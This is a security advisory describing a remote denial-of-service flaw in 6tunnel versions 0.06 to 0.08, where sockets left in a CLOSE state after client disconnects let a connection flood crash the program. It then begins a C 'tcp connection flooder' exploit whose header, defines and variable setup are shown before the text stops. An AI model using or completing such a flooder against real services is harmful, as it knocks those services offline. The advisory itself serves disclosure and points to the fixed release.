6tunnel is a simple tunneling program for applications that do not speak IPv6. It is mostly used as an IRC proxy for clients without IPv6 support. A serious vulnerability in this program allows any user to crash 6tunnel remotely.
Credit:
The information has been provided by awayzzz.
Vulnerable systems:
6tunnel version 0.06
6tunnel version 0.07
6tunnel version 0.08
Immune systems:
6tunnel version 0.09
The socket that is opened whenever a client connects to 6tunnel is not correctly closed at the end of connection: in some cases, when the connection is closed by server (i.e. on IRC with a quit command) the socket will be closed after a short timeout. However if the socket is closed after a client disconnects, the socket remains in its CLOSE state until 6tunnel will be either killed or stopped.
Therefore, flooding 6tunnel with connection requests and their corresponding disconnection will cause a lot of sockets to not fully close. This will eventually cause 6tunnel to crash.
Exploit:
/*
* ipv4/ipv6 tcp connection flooder.
* Originally used as a DoS for 6tunnel (versions < 0.08).
* Version 0.08 is a broken version. Please update to 0.09.
*
* Description of options:
* -6 : flood an ipv6 address.
* port : tcp port to flood (default: 667)
* delay: delay between connections (ms).
* times: max number of connections (default: 2500).
*
* awayzzz <awayzzz@digibel.org>
* You can even find me @IRCnet if you need.
*/
#define DEFP 667 // default port.
#define DEFT 2500 // default number of connections.
#define TIME 100000 // delay between connections.
// tune it for best performances!
#define HAVE_IPV6
#define VALID_PORT(i) (i<65535 && i > 0)
int main(int argc,char *argv[])
{
int ret, fd, i, ip6 = 0;
int times = DEFT, port = DEFP, delay = TIME;
struct sockaddr_in sin;
